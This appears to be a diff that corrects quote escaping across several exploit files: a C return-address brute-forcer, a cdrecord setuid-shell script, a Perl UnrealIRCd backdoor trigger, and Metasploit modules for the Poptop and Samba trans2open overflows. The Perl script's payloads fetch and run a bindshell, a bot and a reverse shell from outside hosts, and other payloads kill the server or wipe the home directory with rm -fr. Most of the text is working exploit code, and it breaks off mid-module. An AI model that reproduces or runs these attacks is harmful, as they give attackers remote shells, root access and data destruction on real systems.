printf(\"buf1 = %sn\",buf1);
|
||||
printf("buf1 = %sn",buf1);
|
||||
|
||||
execl(Fuckpr0,\"chpasswd\",buf1,buf2,0);
|
||||
execl(Fuckpr0,"chpasswd",buf1,buf2,0);
|
||||
|
||||
}
|
||||
|
||||
wait(&status);
|
||||
|
||||
printf(\"[-] Signal: #%in\", status);
|
||||
printf("[-] Signal: #%in", status);
|
||||
|
||||
if(WIFEXITED(status) != 0 ) {
|
||||
|
||||
printf(\"[=] Step.%i: 0x%xn[~] Exiting...n\",(j/2),ret_addr);
|
||||
printf("[=] Step.%i: 0x%xn[~] Exiting...n",(j/2),ret_addr);
|
||||
|
||||
exit(1);
|
||||
|
||||
|
@ -127,7 +127,7 @@ ret_addr += offset;
|
|||
|
||||
j += offset;
|
||||
|
||||
printf(\"[=] Offset:%d Use ret:0x%xn\",j, ret_addr);
|
||||
printf("[=] Offset:%d Use ret:0x%xn",j, ret_addr);
|
||||
|
||||
}
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
#
|
||||
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
|
||||
#
|
||||
# Exploits cdrecord\'s exec() of $RSH before dropping privs
|
||||
# Exploits cdrecord's exec() of $RSH before dropping privs
|
||||
#
|
||||
|
||||
cat > ./cpbinbash.c << __EOF__
|
||||
|
@ -17,14 +17,14 @@ int fd1, fd2;
|
|||
int count;
|
||||
char buffer[1];
|
||||
|
||||
/* Set ID\'s */
|
||||
/* Set ID's */
|
||||
setuid( geteuid() );
|
||||
setgid( geteuid() );
|
||||
|
||||
/* Copy the shell */
|
||||
if ((fd1=open( \"/bin/bash\", O_RDONLY))<0)
|
||||
if ((fd1=open( "/bin/bash", O_RDONLY))<0)
|
||||
return -1;
|
||||
if ((fd2=open( \"./bash\", O_WRONLY|O_CREAT))<0)
|
||||
if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
|
||||
return -1;
|
||||
while((count=read(fd1, buffer, 1)))
|
||||
write(fd2, buffer, count);
|
||||
|
@ -33,8 +33,8 @@ close( fd1 );
|
|||
close( fd2 );
|
||||
|
||||
/* Priv the shell */
|
||||
chown( \"./bash\", geteuid(), geteuid() );
|
||||
chmod( \"./bash\", 3565 );
|
||||
chown( "./bash", geteuid(), geteuid() );
|
||||
chmod( "./bash", 3565 );
|
||||
}
|
||||
__EOF__
|
||||
|
||||
|
|
|
@ -7,53 +7,53 @@ use Socket;
|
|||
use IO::Socket;
|
||||
|
||||
## Payload options
|
||||
my $payload1 = \'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &\';
|
||||
my $payload2 = \'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &\';
|
||||
my $payload3 = \'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &\';
|
||||
my $payload4 = \'AB; killall ircd\';
|
||||
my $payload5 = \'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *\';
|
||||
my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &';
|
||||
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';
|
||||
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';
|
||||
my $payload4 = 'AB; killall ircd';
|
||||
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *';
|
||||
|
||||
$host = \"\";
|
||||
$port = \"\";
|
||||
$type = \"\";
|
||||
$host = "";
|
||||
$port = "";
|
||||
$type = "";
|
||||
$host = @ARGV[0];
|
||||
$port = @ARGV[1];
|
||||
$type = @ARGV[2];
|
||||
|
||||
if ($host eq \"\") { usage(); }
|
||||
if ($port eq \"\") { usage(); }
|
||||
if ($type eq \"\") { usage(); }
|
||||
if ($host eq "") { usage(); }
|
||||
if ($port eq "") { usage(); }
|
||||
if ($type eq "") { usage(); }
|
||||
|
||||
sub usage {
|
||||
printf \"\\nUsage :\\n\";
|
||||
printf \"perl unrealpwn.pl <host> <port> <type>\\n\\n\";
|
||||
printf \"Command list :\\n\";
|
||||
printf \"[1] - Perl Bindshell\\n\";
|
||||
printf \"[2] - Perl Reverse Shell\\n\";
|
||||
printf \"[3] - Perl Bot\\n\";
|
||||
printf \"-----------------------------\\n\";
|
||||
printf \"[4] - shutdown ircserver\\n\";
|
||||
printf \"[5] - delete ircserver\\n\";
|
||||
printf "\nUsage :\n";
|
||||
printf "perl unrealpwn.pl <host> <port> <type>\n\n";
|
||||
printf "Command list :\n";
|
||||
printf "[1] - Perl Bindshell\n";
|
||||
printf "[2] - Perl Reverse Shell\n";
|
||||
printf "[3] - Perl Bot\n";
|
||||
printf "-----------------------------\n";
|
||||
printf "[4] - shutdown ircserver\n";
|
||||
printf "[5] - delete ircserver\n";
|
||||
exit(1);
|
||||
}
|
||||
|
||||
sub unreal_trojan {
|
||||
my $ircserv = $host;
|
||||
my $ircport = $port;
|
||||
my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => \"tcp\") || die \"Failed to connect to $ircserv on $ircport ...\\n\\n\";
|
||||
print \"[+] Payload sent ...\\n\";
|
||||
if ($type eq \"1\") {
|
||||
print $sockd \"$payload1\";
|
||||
} elsif ($type eq \"2\") {
|
||||
print $sockd \"$payload2\";
|
||||
} elsif ($type eq \"3\") {
|
||||
print $sockd \"$payload3\";
|
||||
} elsif ($type eq \"4\") {
|
||||
print $sockd \"$payload4\";
|
||||
} elsif ($type eq \"5\") {
|
||||
print $sockd \"$payload5\";
|
||||
my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => "tcp") || die "Failed to connect to $ircserv on $ircport ...\n\n";
|
||||
print "[+] Payload sent ...\n";
|
||||
if ($type eq "1") {
|
||||
print $sockd "$payload1";
|
||||
} elsif ($type eq "2") {
|
||||
print $sockd "$payload2";
|
||||
} elsif ($type eq "3") {
|
||||
print $sockd "$payload3";
|
||||
} elsif ($type eq "4") {
|
||||
print $sockd "$payload4";
|
||||
} elsif ($type eq "5") {
|
||||
print $sockd "$payload5";
|
||||
} else {
|
||||
printf \"\\nInvalid Option ...\\n\\n\";
|
||||
printf "\nInvalid Option ...\n\n";
|
||||
usage();
|
||||
}
|
||||
close($sockd);
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Poptop Negative Read Overflow\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Poptop Negative Read Overflow',
|
||||
'Description' => %q{
|
||||
This is an exploit for the Poptop negative read overflow. This will
|
||||
work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
|
||||
currently do not have a good way to detect Poptop versions.
|
||||
|
@ -31,44 +31,44 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Using the current method of exploitation, our socket will be closed
|
||||
before we have the ability to run code, preventing the use of Findsock.
|
||||
},
|
||||
\'Author\' => \'spoonm\',
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 11114 $\',
|
||||
\'References\' =>
|
||||
'Author' => 'spoonm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 11114 $',
|
||||
'References' =>
|
||||
[
|
||||
[\'CVE\', \'2003-0213\'],
|
||||
[\'OSVDB\', \'3293\'],
|
||||
[\'URL\', \'http://securityfocus.com/archive/1/317995\'],
|
||||
[\'URL\', \'http://www.freewebs.com/blightninjas/\'],
|
||||
['CVE', '2003-0213'],
|
||||
['OSVDB', '3293'],
|
||||
['URL', 'http://securityfocus.com/archive/1/317995'],
|
||||
['URL', 'http://www.freewebs.com/blightninjas/'],
|
||||
],
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' =>
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
# Payload space is dynamically determined
|
||||
\'MinNops\' => 16,
|
||||
\'StackAdjustment\' => -1088,
|
||||
\'Compat\' =>
|
||||
'MinNops' => 16,
|
||||
'StackAdjustment' => -1088,
|
||||
'Compat' =>
|
||||
{
|
||||
\'ConnectionType\' => \'-find\',
|
||||
'ConnectionType' => '-find',
|
||||
}
|
||||
},
|
||||
\'SaveRegisters\' => [ \'esp\' ],
|
||||
\'Platform\' => \'linux\',
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Targets\' =>
|
||||
'SaveRegisters' => [ 'esp' ],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[\'Linux Bruteforce\',
|
||||
{ \'Bruteforce\' =>
|
||||
['Linux Bruteforce',
|
||||
{ 'Bruteforce' =>
|
||||
{
|
||||
\'Start\' => { \'Ret\' => 0xbffffa00 },
|
||||
\'Stop\' => { \'Ret\' => 0xbffff000 },
|
||||
\'Step\' => 0
|
||||
'Start' => { 'Ret' => 0xbffffa00 },
|
||||
'Stop' => { 'Ret' => 0xbffff000 },
|
||||
'Step' => 0
|
||||
}
|
||||
}
|
||||
],
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Apr 9 2003\'))
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 9 2003'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
|
@ -77,26 +77,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address. Affects PayloadSpace.\", 220 ]),
|
||||
OptInt.new(\"RetLength\", [ true, \"Length of returns after payload.\", 32 ]),
|
||||
OptInt.new(\"ExtraSpace\", [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]),
|
||||
OptString.new(\"Hostname\", [ false, \"PPTP Packet hostname\", \'\' ]),
|
||||
OptString.new(\"Vendor\", [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]),
|
||||
OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),
|
||||
OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),
|
||||
OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
|
||||
OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),
|
||||
OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Dynamic payload space calculation
|
||||
def payload_space(explicit_target = nil)
|
||||
datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i
|
||||
datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
|
||||
end
|
||||
|
||||
def build_packet(length)
|
||||
[length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') +
|
||||
[1,0].pack(\'cc\') +
|
||||
[0].pack(\'n\') +
|
||||
[1,1,0,2600].pack(\'NNnn\') +
|
||||
datastore[\'Hostname\'].ljust(64, \"\\x00\") +
|
||||
datastore[\'Vendor\'].ljust(64, \"\\x00\")
|
||||
[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
|
||||
[1,0].pack('cc') +
|
||||
[0].pack('n') +
|
||||
[1,1,0,2600].pack('NNnn') +
|
||||
datastore['Hostname'].ljust(64, "\x00") +
|
||||
datastore['Vendor'].ljust(64, "\x00")
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -114,13 +114,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def brute_exploit(addrs)
|
||||
connect
|
||||
|
||||
print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\")
|
||||
print_status("Trying #{"%.8x" % addrs['Ret']}...")
|
||||
|
||||
# Construct the evil length packet
|
||||
packet =
|
||||
build_packet(1) +
|
||||
payload.encoded +
|
||||
([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4))
|
||||
([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))
|
||||
|
||||
sock.put(packet)
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Samba trans2open Overflow (Linux x86)\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Samba trans2open Overflow (Linux x86)',
|
||||
'Description' => %q{
|
||||
This exploits the buffer overflow found in Samba versions
|
||||
2.2.0 to 2.2.8. This particular module is capable of
|
||||
exploiting the flaw on x86 Linux systems that do not
|
||||
|
@ -29,45 +29,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
NOTE: Some older versions of RedHat do not seem to be vulnerable
|
||||
since they apparently do not allow anonymous access to IPC.
|
||||
},
|
||||
\'Author\' => [ \'hdm\', \'jduck\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9828 $\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'hdm', 'jduck' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9828 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2003-0201\' ],
|
||||
[ \'OSVDB\', \'4469\' ],
|
||||
[ \'BID\', \'7294\' ],
|
||||
[ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ]
|
||||
[ 'CVE', '2003-0201' ],
|
||||
[ 'OSVDB', '4469' ],
|
||||
[ 'BID', '7294' ],
|
||||
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
|
||||
],
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' =>
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 1024,
|
||||
\'BadChars\' => \"\\x00\",
|
||||
\'MinNops\' => 512,
|
||||
\'StackAdjustment\' => -3500
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 512,
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
\'Platform\' => \'linux\',
|
||||
\'Targets\' =>
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
# tested OK - jjd:
|
||||
# RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
|
||||
# RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
|
||||
[ \'Samba 2.2.x - Bruteforce\',
|
||||
[ 'Samba 2.2.x - Bruteforce',
|
||||
{
|
||||
\'PtrToNonZero\' => 0xbffffff4, # near the bottom of the stack
|
||||
\'Offset\' => 1055,
|
||||
\'Bruteforce\' =>
|
||||
'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
|
||||
'Offset' => 1055,
|
||||
'Bruteforce' =>
|
||||
{
|
||||
\'Start\' => { \'Ret\' => 0xbffffdfc },
|
||||
\'Stop\' => { \'Ret\' => 0xbfa00000 },
|
||||
\'Step\' => 256
|
||||
'Start' => { 'Ret' => 0xbffffdfc },
|
||||
'Stop' => { 'Ret' => 0xbfa00000 },
|
||||
'Step' => 256
|
||||
}
|
||||
}
|
||||
],
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Apr 7 2003\'
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 7 2003'
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
@ -78,20 +78,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def brute_exploit(addrs)
|
||||
|
||||
curr_ret = addrs[\'Ret\']
|
||||
curr_ret = addrs['Ret']
|
||||
begin
|
||||
print_status(\"Trying return address 0x%.8x...\" % curr_ret)
|
||||
print_status("Trying return address 0x%.8x..." % curr_ret)
|
||||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
if ! @checked_peerlm
|
||||
if smb_peer_lm !~ /samba/i
|
||||
raise RuntimeError, \"This target is not a Samba server (#{smb_peer_lm}\"
|
||||
raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}"
|
||||
end
|
||||
|
||||
if smb_peer_lm =~ /Samba [34]\\./i
|
||||
raise RuntimeError, \"This target is not a vulnerable Samba server (#{smb_peer_lm})\"
|
||||
if smb_peer_lm =~ /Samba [34]\./i
|
||||
raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
# This value *must* be 1988 to allow findrecv shellcode to work
|
||||
# XXX: I\'m not sure the above comment is true...
|
||||
# XXX: I'm not sure the above comment is true...
|
||||
pattern = rand_text_english(1988)
|
||||
|
||||
# See the OSX and Solaris versions of this module for additional
|
||||
|
@ -107,8 +107,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
|
||||
# (rpmbuild -bp ; edited/reran config.status ; make)
|
||||
eip_off = target[\'Offset\']
|
||||
ptr_to_non_zero = target[\'PtrToNonZero\']
|
||||
eip_off = target['Offset']
|
||||
ptr_to_non_zero = target['PtrToNonZero']
|
||||
|
||||
# Stuff the shellcode into the request
|
||||
pattern[0, payload.encoded.length] = payload.encoded
|
||||
|
@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 222 if (IS_IPC(conn)) {
|
||||
# 223 return(ERROR(ERRSRV,ERRaccess));
|
||||
# 224 }
|
||||
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\')
|
||||
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
|
||||
|
||||
# We want to avoid crashing on the following two derefences.
|
||||
#
|
||||
|
@ -127,23 +127,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 117 {
|
||||
# 118 int outsize = set_message(outbuf,0,0,True);
|
||||
# 119 int cmd = CVAL(inbuf,smb_com);
|
||||
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\')
|
||||
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\')
|
||||
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
|
||||
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
|
||||
|
||||
# This stream covers the framepointer and the return address
|
||||
#pattern[1199, 400] = [curr_ret].pack(\'N\') * 100
|
||||
pattern[eip_off, 4] = [curr_ret].pack(\'V\')
|
||||
#pattern[1199, 400] = [curr_ret].pack('N') * 100
|
||||
pattern[eip_off, 4] = [curr_ret].pack('V')
|
||||
|
||||
trans =
|
||||
\"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+
|
||||
\"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+
|
||||
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
|
||||
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
|
||||
pattern
|
||||
|
||||
# puts \"press any key\"; $stdin.gets
|
||||
# puts "press any key"; $stdin.gets
|
||||
|
||||
sock.put(trans)
|
||||
handler
|
||||
|
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_error(\"#{rhost} #{e}\")
|
||||
print_error("#{rhost} #{e}")
|
||||
end
|
||||
|
||||
handler
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Samba trans2open Overflow (*BSD x86)\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Samba trans2open Overflow (*BSD x86)',
|
||||
'Description' => %q{
|
||||
This exploits the buffer overflow found in Samba versions
|
||||
2.2.0 to 2.2.8. This particular module is capable of
|
||||
exploiting the flaw on x86 Linux systems that do not
|
||||
have the noexec stack option set.
|
||||
},
|
||||
\'Author\' => [ \'hdm\', \'jduck\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9552 $\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'hdm', 'jduck' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9552 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2003-0201\' ],
|
||||
[ \'OSVDB\', \'4469\' ],
|
||||
[ \'BID\', \'7294\' ],
|
||||
[ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ]
|
||||
[ 'CVE', '2003-0201' ],
|
||||
[ 'OSVDB', '4469' ],
|
||||
[ 'BID', '7294' ],
|
||||
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
|
||||
],
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' =>
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 1024,
|
||||
\'BadChars\' => \"\\x00\",
|
||||
\'MinNops\' => 512,
|
||||
\'StackAdjustment\' => -3500
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 512,
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
\'Platform\' => \'bsd\',
|
||||
\'Targets\' =>
|
||||
'Platform' => 'bsd',
|
||||
'Targets' =>
|
||||
[
|
||||
# tested OK - jjd:
|
||||
# FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8
|
||||
[ \'Samba 2.2.x - Bruteforce\',
|
||||
[ 'Samba 2.2.x - Bruteforce',
|
||||
{
|
||||
\'PtrToNonZero\' => 0xbfbffff4, # near the bottom of the stack
|
||||
\'Offset\' => 1055,
|
||||
\'Bruteforce\' =>
|
||||
'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack
|
||||
'Offset' => 1055,
|
||||
'Bruteforce' =>
|
||||
{
|
||||
\'Start\' => { \'Ret\' => 0xbfbffdfc },
|
||||
\'Stop\' => { \'Ret\' => 0xbfa00000 },
|
||||
\'Step\' => 256
|
||||
'Start' => { 'Ret' => 0xbfbffdfc },
|
||||
'Stop' => { 'Ret' => 0xbfa00000 },
|
||||
'Step' => 256
|
||||
}
|
||||
}
|
||||
],
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Apr 7 2003\'
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 7 2003'
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
@ -74,15 +74,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def brute_exploit(addrs)
|
||||
|
||||
curr_ret = addrs[\'Ret\']
|
||||
curr_ret = addrs['Ret']
|
||||
begin
|
||||
print_status(\"Trying return address 0x%.8x...\" % curr_ret)
|
||||
print_status("Trying return address 0x%.8x..." % curr_ret)
|
||||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
# This value *must* be 1988 to allow findrecv shellcode to work
|
||||
# XXX: I\'m not sure the above comment is true...
|
||||
# XXX: I'm not sure the above comment is true...
|
||||
pattern = rand_text_english(1988)
|
||||
|
||||
# See the OSX and Solaris versions of this module for additional
|
||||
|
@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
|
||||
# (rpmbuild -bp ; edited/reran config.status ; make)
|
||||
eip_off = target[\'Offset\']
|
||||
ptr_to_non_zero = target[\'PtrToNonZero\']
|
||||
eip_off = target['Offset']
|
||||
ptr_to_non_zero = target['PtrToNonZero']
|
||||
|
||||
# Stuff the shellcode into the request
|
||||
pattern[0, payload.encoded.length] = payload.encoded
|
||||
|
@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 222 if (IS_IPC(conn)) {
|
||||
# 223 return(ERROR(ERRSRV,ERRaccess));
|
||||
# 224 }
|
||||
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\')
|
||||
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
|
||||
|
||||
# We want to avoid crashing on the following two derefences.
|
||||
#
|
||||
|
@ -110,23 +110,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 117 {
|
||||
# 118 int outsize = set_message(outbuf,0,0,True);
|
||||
# 119 int cmd = CVAL(inbuf,smb_com);
|
||||
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\')
|
||||
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\')
|
||||
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
|
||||
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
|
||||
|
||||
# This stream covers the framepointer and the return address
|
||||
#pattern[1199, 400] = [curr_ret].pack(\'N\') * 100
|
||||
pattern[eip_off, 4] = [curr_ret].pack(\'V\')
|
||||
#pattern[1199, 400] = [curr_ret].pack('N') * 100
|
||||
pattern[eip_off, 4] = [curr_ret].pack('V')
|
||||
|
||||
trans =
|
||||
\"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+
|
||||
\"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+
|
||||
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
|
||||
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
